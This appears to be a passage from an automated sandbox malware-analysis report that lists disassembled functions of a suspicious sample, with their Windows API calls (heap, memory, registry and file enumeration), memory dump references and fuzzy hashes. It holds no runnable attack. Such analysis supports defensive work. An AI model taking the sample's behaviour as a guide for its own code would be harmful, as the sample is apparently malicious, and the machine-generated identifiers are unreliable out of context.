                                                                                                                                                                                                                • Part of subcall function 012FE6B0: GetDriveTypeA.KERNEL32(?), ref: 012FE768
                                                                                                                                                                                                                • Part of subcall function 012FE6B0: SetCurrentDirectoryA.KERNEL32(?), ref: 012FE77B
                                                                                                                                                                                                                • Part of subcall function 012FE6B0: FindFirstFileA.KERNEL32(?,?), ref: 012FE7DD
                                                                                                                                                                                                                • Part of subcall function 012FE6B0: SetErrorMode.KERNEL32(?), ref: 012FEAF3
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C079), ref: 012FEB0B
                                                                                                                                                                                                                • Part of subcall function 012F39D0: EnterCriticalSection.KERNEL32(0132FB68,00000001,00000000,775B5CE0), ref: 012F39E9
                                                                                                                                                                                                                • Part of subcall function 012F39D0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 012F39FB
                                                                                                                                                                                                                • Part of subcall function 012F39D0: _snprintf.MSVCRT(?,00000104,%s%s,01339D68,0133D3A4), ref: 012F3A1B
                                                                                                                                                                                                                • Part of subcall function 012F39D0: SetCurrentDirectoryA.KERNEL32(?), ref: 012F3A2B
                                                                                                                                                                                                                • Part of subcall function 012F39D0: PathAddBackslashA.SHLWAPI(?), ref: 012F3B00
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectory$BackslashDriveErrorModePathmemset$CriticalEnterFileFindFirstLogicalSectionStringsType_snprintf
                                                                                                                                                                                                              • String ID: 61C5C079$COLV
                                                                                                                                                                                                              • API String ID: 2461973751-3533035949
                                                                                                                                                                                                              • Opcode ID: 5af2261b0e325a42618f22e6b8984e32e4bff5eb108956f3cf06c372e745f6d3
                                                                                                                                                                                                              • Instruction ID: c97b52eae001c42713fa5946c813334280bc225357e2e96370f1c0a1b74c223c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5af2261b0e325a42618f22e6b8984e32e4bff5eb108956f3cf06c372e745f6d3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEB092726A131266C0663BA62C06969AA242BE4D1AF11241EF20270A488D9150A0D77E
                                                                                                                                                                                                              Function 012A9C90 Relevance: 5.2, Strings: 4, Instructions: 187COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_1280000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: ,D0<$,D0<$D0<$D0<
                                                                                                                                                                                                              • API String ID: 0-1748840775
                                                                                                                                                                                                              • Opcode ID: 9c97c9d7d5ab04b2b8c5162830f736a79e74322f88f577f4ab0dfe4acc82c9df
                                                                                                                                                                                                              • Instruction ID: 447b562caa6e0e8c4e732344c552027760e8d997c974f44a808086c171043214
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c97c9d7d5ab04b2b8c5162830f736a79e74322f88f577f4ab0dfe4acc82c9df
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61519F71D10229ABEF14CFA9CD84BBEBBB8EB45705F50451AFB00EB191D7709980CB95
                                                                                                                                                                                                              Function 01319430 Relevance: 5.2, APIs: 4, Instructions: 158COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,00000008,00000000,?), ref: 01319468
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,00000008,00000000,?), ref: 0131950B
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,?,?,?,00000008,00000000,?), ref: 01319584
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,?,?,?,00000008,00000000,?), ref: 013195BD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1297977491-0
                                                                                                                                                                                                              • Opcode ID: e9d7ceda1a8cdc05e7b4ffc97cbcd436fa73971bb4fbed7fa3a94032e4585500
                                                                                                                                                                                                              • Instruction ID: 2075a89948080ee75873469c9d8309325d8b4c36e1a54f6d86bad61c7ce87f79
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9d7ceda1a8cdc05e7b4ffc97cbcd436fa73971bb4fbed7fa3a94032e4585500
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89518271A00B018FC328DF69C9D4666F7F6FF84208B284A2DD58687B15E775F954CB40
                                                                                                                                                                                                              Function 0130B0A0 Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT(00000028,?,?,?,?,01314DFF,?,?,?,?,?,?,00000005,?), ref: 0130B0AE
                                                                                                                                                                                                              • malloc.MSVCRT(00000014,?,01314DFF,?,?,?,?,?,?,00000005,?,?,?,?,774D3080), ref: 0130B0C3
                                                                                                                                                                                                              • malloc.MSVCRT(00000028,?,01314DFF,?,?,?,?,?,?,00000005,?,?,?,?,774D3080), ref: 0130B0E9
                                                                                                                                                                                                              • malloc.MSVCRT(00000014,?,01314DFF,?,?,?,?,?,?,00000005,?,?,?,?,774D3080), ref: 0130B104
                                                                                                                                                                                                                • Part of subcall function 0130A9D0: free.MSVCRT(?,?,?,772D7310,?,0130CEC2,?,?,?,0130A2D8), ref: 0130A9FF
                                                                                                                                                                                                                • Part of subcall function 0130A9D0: free.MSVCRT(0130CEC2,?,?,772D7310,?,0130CEC2,?,?,?,0130A2D8), ref: 0130AA0F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1480856625-0
                                                                                                                                                                                                              • Opcode ID: 3e8284ca7b21f7c2512f7969d2fce735241ad0da731b486064087126cebf3bb0
                                                                                                                                                                                                              • Instruction ID: d7e9dbcdd2f2e854fed3c8e6e727b1eb0ab7731c9e4e6a2f050b7a4e0e4e0b98
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e8284ca7b21f7c2512f7969d2fce735241ad0da731b486064087126cebf3bb0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F21CDB46013059FD710CF2AD884A46FBE8FF98310F15C5AAE5488B362D7B1E910CBA0
                                                                                                                                                                                                              Function 012F4A30 Relevance: 5.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012E6C70: memset.MSVCRT(?,00000000,000000FF,00000000), ref: 012E6CA1
                                                                                                                                                                                                                • Part of subcall function 012E6C70: memset.MSVCRT(?,00000000,00000103,?,00000000,000000FF,00000000), ref: 012E6CBF
                                                                                                                                                                                                                • Part of subcall function 012E6C70: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 012E6CDB
                                                                                                                                                                                                                • Part of subcall function 012E6C70: RegQueryValueExA.ADVAPI32(?,9E2B3B9Fa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 012E6D02
                                                                                                                                                                                                                • Part of subcall function 012E6C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 012E6D7A
                                                                                                                                                                                                                • Part of subcall function 012E6C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 012E6D81
                                                                                                                                                                                                                • Part of subcall function 012E6C70: memset.MSVCRT(00000000,00000000,00000110,?,?,?,?,?,00000000), ref: 012E6D95
                                                                                                                                                                                                                • Part of subcall function 012E6C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 012E6DAE
                                                                                                                                                                                                                • Part of subcall function 012E6C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 012E6DBC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,774D0F10,00000000,012FA2D3), ref: 012F4A88
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F4A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F4A98
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F4A9B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocCloseFreeOpenQueryValidateValuelstrcpyn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 789118668-0
                                                                                                                                                                                                              • Opcode ID: 548c473f1f2105b633028f1f9f8e57b55b00d38b36290bedc49a32d76974b22f
                                                                                                                                                                                                              • Instruction ID: 024cf86f8f68f4d94cace8b175845c7a9e0719f7bb5b3ac45811f20b4b1479aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 548c473f1f2105b633028f1f9f8e57b55b00d38b36290bedc49a32d76974b22f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D0128727691818AEB316A7C6830B77EB9DDB92650F0C027EEB45C7289E6A1CC048358
                                                                                                                                                                                                              Function 012EEAE0 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 012EEB1F
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012EEB26
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012EEB36
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 012EEB41
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 471586229-0
                                                                                                                                                                                                              • Opcode ID: f3586131a67e0142e02ed62a03a0e5ed4ef509866af080d7b4f4e9a57415a068
                                                                                                                                                                                                              • Instruction ID: 23a5d3d4aebe6f2b18aa7ca3beb200d3f36ec271cb15d09d35607aa6fc20d31f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3586131a67e0142e02ed62a03a0e5ed4ef509866af080d7b4f4e9a57415a068
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83012B33600316ABDB219A6C9C88EA7B7DCBF56760B458305FE05CB185F620E904C3F0
                                                                                                                                                                                                              Function 012FAD60 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,00000018,?,00000000,?,012F080E,?), ref: 012FAD98
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,012F080E,?), ref: 012FAD9F
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?,?,012F080E,?), ref: 012FADAF
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?,?,012F080E,?), ref: 012FADBD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 471586229-0
                                                                                                                                                                                                              • Opcode ID: 4c9e1b24ef7ecdd97ce39daa550787677e0ea979f69b5bd4e2db9493f6a06eb2
                                                                                                                                                                                                              • Instruction ID: c3ec78dcdea24b3640758c74e2e91340bd305e77b7c7ed1bae3acc41bfc42f1b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c9e1b24ef7ecdd97ce39daa550787677e0ea979f69b5bd4e2db9493f6a06eb2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A017B32510617ABD3229A2CDC48FABF75CDF51B61F048328FB098B1C0EA60E90483E0
                                                                                                                                                                                                              Function 012EF370 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 012EF388
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012EF38F
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012EF39F
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 012EF3AA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 471586229-0
                                                                                                                                                                                                              • Opcode ID: 63a84372a24f8df8918f69ac1ddcf16a6139d1c1aa54234f10288b016ff1fb9d
                                                                                                                                                                                                              • Instruction ID: 4eeeaaeff59bf0c4302ee61ff09d5f53e6a4dc8847ffabbce43ddc5668c8c9c6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63a84372a24f8df8918f69ac1ddcf16a6139d1c1aa54234f10288b016ff1fb9d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DF0A03360166277D6317EAD9C48E9B7B9CEB96B60F408214FF04AA181CA20D90083F4
                                                                                                                                                                                                              Function 012EE470 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?,774CF380,?,012EE879,00000000,?,00000000,012EFBC2), ref: 012EE484
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012EE487
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EE494
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012EE497
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: 1fbb4fb67d4d94e608ac110d813f7e966e82d5b4ef550a2593cd2e73c92e601c
                                                                                                                                                                                                              • Instruction ID: 2aa17897ae2a97a68b4c466f3ccaa9a884d3fd39f9dd787bf380005541c7a42d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fbb4fb67d4d94e608ac110d813f7e966e82d5b4ef550a2593cd2e73c92e601c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BF030745112136AEB216F799C4CBDB7BDCFF29691FD18054E608D3144E775880097B0
                                                                                                                                                                                                              Function 01324130 Relevance: 5.0, APIs: 4, Instructions: 24memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 01324145
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 01324148
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 01324155
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 01324158
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: 277eab4d83b788b8b9ef973567f17d93189191be479e28f6bb963a11a6d89f9e
                                                                                                                                                                                                              • Instruction ID: 66ab93c45b3f2fb717c5efa744b219a49395997e768ee1ca17c64332a70e4b6f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 277eab4d83b788b8b9ef973567f17d93189191be479e28f6bb963a11a6d89f9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FE0EC3264122867E5307BAA6C08FDBBF5CEF95B61F158015F619E7244CA75A50087F0
                                                                                                                                                                                                              Function 012F41B0 Relevance: 5.0, APIs: 4, Instructions: 18memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,7597EA50,01304B6D), ref: 012F41BE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F41C1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F41CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F41D1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: b1c026a586c90129d9f4c1a7cda701280d71980b345ae5f06b79da6416e39b49
                                                                                                                                                                                                              • Instruction ID: 7bca2ff0943b23e2b34f99df7052f13adb5fdb8bbdd286ea7637ea5700456002
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1c026a586c90129d9f4c1a7cda701280d71980b345ae5f06b79da6416e39b49
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BD0C77164525166E5703A766C0CF9FBD2CDFD5B51F058018F716D6188CA748100C7F0